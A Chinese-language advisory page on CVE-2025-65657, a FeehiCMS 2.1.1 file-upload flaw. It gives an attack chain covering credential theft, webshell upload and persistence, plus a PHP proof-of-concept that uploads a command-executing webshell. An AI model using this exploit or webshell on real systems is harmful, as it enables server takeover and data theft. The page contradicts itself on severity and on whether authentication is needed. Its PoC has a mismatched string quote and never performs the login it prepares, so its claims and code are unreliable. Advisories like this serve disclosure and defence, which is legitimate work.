CVE-2025-65657: FeehiCMS 2.1.1广告管理模块任意文件上传导致RCE

漏洞信息

漏洞编号

CVE-2025-65657

漏洞类型

远程代码执行/任意文件上传

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FeehiCMS 2.1.1

漏洞概述

CVE-2025-65657是FeehiCMS 2.1.1版本中的一个高危安全漏洞，存在于广告管理模块中。该漏洞允许经过身份验证的远程攻击者通过不受限制的文件上传功能上传恶意文件，进而在服务器上执行任意代码，最终导致远程代码执行（RCE）。FeehiCMS是一款基于PHP开发的内容管理系统，广泛应用于企业网站和各类Web应用。由于该系统在广告管理功能中对用户上传的文件缺乏充分的验证、清理和安全限制，攻击者可以绕过常规的文件类型检查，上传包含恶意PHP代码的文件。一旦这些恶意文件被服务器存储并在可执行路径下，攻击者即可通过访问该文件触发代码执行，从而完全控制受影响的服务器，窃取敏感数据、安装后门或进行进一步的内网渗透。

技术细节

FeehiCMS 2.1.1的广告管理模块存在任意文件上传漏洞。漏洞的根本原因在于系统对上传文件的扩展名、MIME类型和内容缺乏严格的验证机制。攻击者首先需要获取FeehiCMS的有效用户凭证登录系统，然后导航至广告管理功能模块。在上传广告资源时，系统未能正确限制可上传的文件类型，允许攻击者上传.php等可执行文件格式。攻击者可以构造包含恶意代码的PHP文件（如webshell），通过广告管理功能的上传接口将其写入服务器。由于上传目录通常位于Web根目录或可被Web服务器解析的路径下，攻击者可以通过HTTP请求访问该文件，触发PHP代码执行，从而在服务器上执行任意系统命令。这种漏洞利用方式简单直接，攻击成本低，但危害极大，可导致服务器完全沦陷。

攻击链分析

STEP 1

1

收集目标信息：识别目标网站使用的FeehiCMS版本，确认广告管理模块可访问

STEP 2

2

获取认证凭证：通过暴力破解、钓鱼或社工手段获取FeehiCMS的有效管理员账号密码

STEP 3

3

登录系统：使用获取的凭证登录FeehiCMS管理后台

STEP 4

4

构造恶意文件：创建包含webshell代码的PHP文件，用于执行系统命令

STEP 5

5

上传恶意文件：通过广告管理模块的上传功能上传构造好的PHP文件，绕过文件类型检查

STEP 6

6

触发代码执行：通过HTTP请求访问上传的恶意PHP文件，传入命令参数执行任意系统命令

STEP 7

7

持久化控制：在服务器上安装后门、建立持久化连接，进行内网横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-65657 PoC - FeehiCMS 2.1.1 RCE via Ad Management File Upload
// Target: FeehiCMS 2.1.1
// Module: Ad Management - Unrestricted File Upload

// Authentication required - obtain valid admin credentials first
$target_url = "http://target.com/index.php?r=ad/upload";
$login_url = "http://target.com/index.php?r=site/login";

// Login to get authenticated session
$login_data = [
    'LoginForm[username]' => 'admin',
    'LoginForm[password]' => 'password',
    'LoginForm[rememberMe]' => 1
];

// Prepare malicious PHP file for upload
$poc_code = '<?php\n'
    . 'if(isset($_GET["cmd"])){\n'
    . '    echo "<pre>";\n'
    . '    system($_GET["cmd"]);\n'
    . '    echo "</pre>";\n'
    . '}\n'
    . 'if(isset($_GET["upload"])){\n'
    . '    file_put_contents("shell.php", base64_decode($_GET["upload"]));\n'
    . '}\n'
    . '?>";

// Create multipart form data for file upload
$boundary = "----WebKitFormBoundary" . bin2hex(random_bytes(16));
$file_content = "--$boundary\r\n"
    . "Content-Disposition: form-data; name=\"Ad[image]\"; filename=\"shell.php\"\r\n"
    . "Content-Type: application/x-php\r\n\r\n"
    . $poc_code . "\r\n"
    . "--$boundary--\r\n";

// Send upload request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $file_content);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: multipart/form-data; boundary=$boundary"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// Execute commands via uploaded shell
echo "RCE Exploit sent. Access uploaded file to execute commands:\n";
echo "http://target.com/uploads/ad/shell.php?cmd=whoami\n";
?>

影响范围

FeehiCMS 2.1.1

防御指南

临时缓解措施

立即限制广告管理模块的访问权限，临时禁用文件上传功能，或将上传目录移出Web根目录并设置为不可执行。同时部署WAF规则拦截.php等可执行文件的恶意上传请求，并加强管理员账户的安全策略，防止凭证泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65657
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65657
3 Details https://www.cvedetails.com/cve/CVE-2025-65657/
4 VulDB https://vuldb.com/cve/CVE-2025-65657
5 Link https://github.com/kiwi865/CVEs/blob/main/CVE-2025-65657.md
6 Link https://github.com/liufee/cms/issues/78